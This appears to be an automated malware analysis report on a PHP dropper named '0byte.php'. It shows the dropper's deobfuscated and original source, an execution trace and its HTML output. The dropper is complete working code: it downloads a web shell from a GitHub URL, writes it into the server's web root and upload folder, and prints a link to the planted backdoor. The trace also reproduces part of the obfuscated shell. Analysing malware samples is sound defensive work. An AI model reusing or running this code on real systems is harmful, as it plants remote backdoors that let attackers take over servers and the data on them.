PHP Malware Analysis

0byte.php

md5: fa57ac30a60753991bf682d7367c9842

Jump to:

Screenshot


Attributes

Environment

Files

URLs


Deobfuscated PHP code

<?php

/*
	403 FORBIDDEN BYPASS
	WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0.php";
function _doEvil($name, $file)
{
    $filename = $name;
    $getFile = file_get_contents($file);
    $rootPath = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR;
    $toRootFopen = fopen("{$rootPath}/{$filename}", 'w');
    $toRootExec = fwrite($toRootFopen, $getFile);
    $rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . "/{$filename}";
    $realPath = getcwd() . DIRECTORY_SEPARATOR;
    $toRealFopen = fopen("{$realPath}/{$filename}", 'w');
    $toRealExec = fwrite($toRealFopen, $getFile);
    $realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://{$_SERVER['HTTP_HOST']}" . dirname($_SERVER[REQUEST_URI]) . "/{$filename}";
    echo "<center>";
    if ($toRootExec) {
        if (file_exists($rootPath . "{$filename}")) {
            echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$rootShellUrl}\" target=\"_blank\">{$rootShellUrl}</a></font></h1>";
        } else {
            echo "<h1><font color=\"red\">{$rootPath}{$filename}<br>Doesn't exist!</font>Try with another method!</h1>";
        }
    } else {
        if ($toRealExec) {
            if (file_exists($realPath . "{$filename}")) {
                echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"{$realShellUrl}\" target=\"_blank\">{$realShellUrl}</a></font></h1>";
            } else {
                echo "<h1><font color=\"red\">FAILED!</font></h1>";
            }
        }
    }
    echo "</center>";
}
_doEvil($name, $source);
?>  

Execution traces

data/traces/fa57ac30a60753991bf682d7367c9842_trace-1676259232.0258.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:34:17.923648]
1	0	1	0.000141	393512
1	3	0	0.000308	406288	{main}	1		/var/www/html/uploads/0byte.php	0	0
1		A						/var/www/html/uploads/0byte.php	6	$source = 'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
1		A						/var/www/html/uploads/0byte.php	7	$name = '0.php'
2	4	0	0.000358	406288	_doEvil	1		/var/www/html/uploads/0byte.php	41	2	'0.php'	'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
2		A						/var/www/html/uploads/0byte.php	10	$filename = '0.php'
3	5	0	0.000386	406288	file_get_contents	0		/var/www/html/uploads/0byte.php	11	1	'https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php'
3	5	1	0.037061	422304
3	5	R			'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
2		A						/var/www/html/uploads/0byte.php	11	$getFile = '<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
2		A						/var/www/html/uploads/0byte.php	12	$rootPath = '/var/www/html/'
3	6	0	0.037192	422352	fopen	0		/var/www/html/uploads/0byte.php	13	2	'/var/www/html//0.php'	'w'
3	6	1	0.037244	422888
3	6	R			resource(5) of type (stream)
2		A						/var/www/html/uploads/0byte.php	13	$toRootFopen = resource(5) of type (stream)
3	7	0	0.037274	422768	fwrite	0		/var/www/html/uploads/0byte.php	14	2	resource(5) of type (stream)	'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
3	7	1	0.037334	422832
3	7	R			9202
2		A						/var/www/html/uploads/0byte.php	14	$toRootExec = 9202
2		A						/var/www/html/uploads/0byte.php	15	$rootShellUrl = 'http://localhost/0.php'
3	8	0	0.037397	422816	getcwd	0		/var/www/html/uploads/0byte.php	16	0
3	8	1	0.037411	422864
3	8	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/0byte.php	16	$realPath = '/var/www/html/uploads/'
3	9	0	0.037437	422920	fopen	0		/var/www/html/uploads/0byte.php	17	2	'/var/www/html/uploads//0.php'	'w'
3	9	1	0.037469	423464
3	9	R			resource(6) of type (stream)
2		A						/var/www/html/uploads/0byte.php	17	$toRealFopen = resource(6) of type (stream)
3	10	0	0.037497	423336	fwrite	0		/var/www/html/uploads/0byte.php	18	2	resource(6) of type (stream)	'<?php\n\n/*\n    0 b y t 3 m 1 n 1 - 2.2\n    Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell\n*/\n\nset_time_limit(0);\nerror_reporting(0);\nerror_log(0);\n\n$sname       = "\\x30\\x62\\x79\\x74\\x33\\x6d\\x31\\x6e\\x31" . "-V2";\n$__gcdir     = "\\x67" . "\\x65\\x74\\x63\\x77\\x64";\n$__fgetcon7s = "\\x66\\x69\\x6c\\x65" . "\\x5f\\x67\\x65\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73";\n$__scdir     = "s" . "\\x63\\x61\\x6e\\x64\\x69" . "r";\n$rm__dir     = "\\x72\\x6d\\x6'
3	10	1	0.037548	423400
3	10	R			9202
2		A						/var/www/html/uploads/0byte.php	18	$toRealExec = 9202
3	11	0	0.037587	423384	dirname	0		/var/www/html/uploads/0byte.php	19	1	'/uploads/0byte.php'
3	11	1	0.037602	423464
3	11	R			'/uploads'
2		A						/var/www/html/uploads/0byte.php	19	$realShellUrl = 'http://localhost/uploads/0.php'
3	12	0	0.037630	423440	file_exists	0		/var/www/html/uploads/0byte.php	22	1	'/var/www/html/0.php'
3	12	1	0.037649	423480
3	12	R			TRUE
2	4	1	0.037669	407096
1	3	1	0.037677	407096
			0.037713	326928
TRACE END   [2023-02-13 01:34:17.961249]


Generated HTML code

<html><head></head><body><center><h1><font color="#00FF00">[OK!] <a href="http://localhost/0.php" target="_blank">http://localhost/0.php</a></font></h1></center>  </body></html>

Original PHP code

<?php
/*
	403 FORBIDDEN BYPASS
	WITH BACKDOOR RECALL / SHELL SUMMON
*/
$source = "https://raw.githubusercontent.com/zerobyte-id/PHP-Backdoor/master/0byt3m1n1/0byt3m1n1.php";
$name = "0.php";

function _doEvil($name, $file) {
	$filename = $name;
	$getFile = file_get_contents($file);
	$rootPath = $_SERVER['DOCUMENT_ROOT'].DIRECTORY_SEPARATOR;
	$toRootFopen = fopen("$rootPath/$filename",'w');
	$toRootExec = fwrite($toRootFopen, $getFile);
	$rootShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]"."/$filename";
	$realPath = getcwd().DIRECTORY_SEPARATOR;
	$toRealFopen = fopen("$realPath/$filename",'w');
	$toRealExec = fwrite($toRealFopen, $getFile);
	$realShellUrl = $_SERVER['HTTPS'] ? "https" : "http" . "://$_SERVER[HTTP_HOST]".dirname($_SERVER[REQUEST_URI])."/$filename";
	echo "<center>";
	if($toRootExec) {
		if(file_exists($rootPath."$filename")) {
			echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$rootShellUrl\" target=\"_blank\">$rootShellUrl</a></font></h1>";
		}
		else { 
			echo "<h1><font color=\"red\">$rootPath$filename<br>Doesn't exist!</font>Try with another method!</h1>";
		}
	}
	else {
		if($toRealExec) {
			if(file_exists($realPath."$filename")) {
				echo "<h1><font color=\"#00FF00\">[OK!] <a href=\"$realShellUrl\" target=\"_blank\">$realShellUrl</a></font></h1>";
			}
			else { 
				echo "<h1><font color=\"red\">FAILED!</font></h1>";
			}
		}
	}
	echo "</center>";
}
_doEvil($name, $source);
?>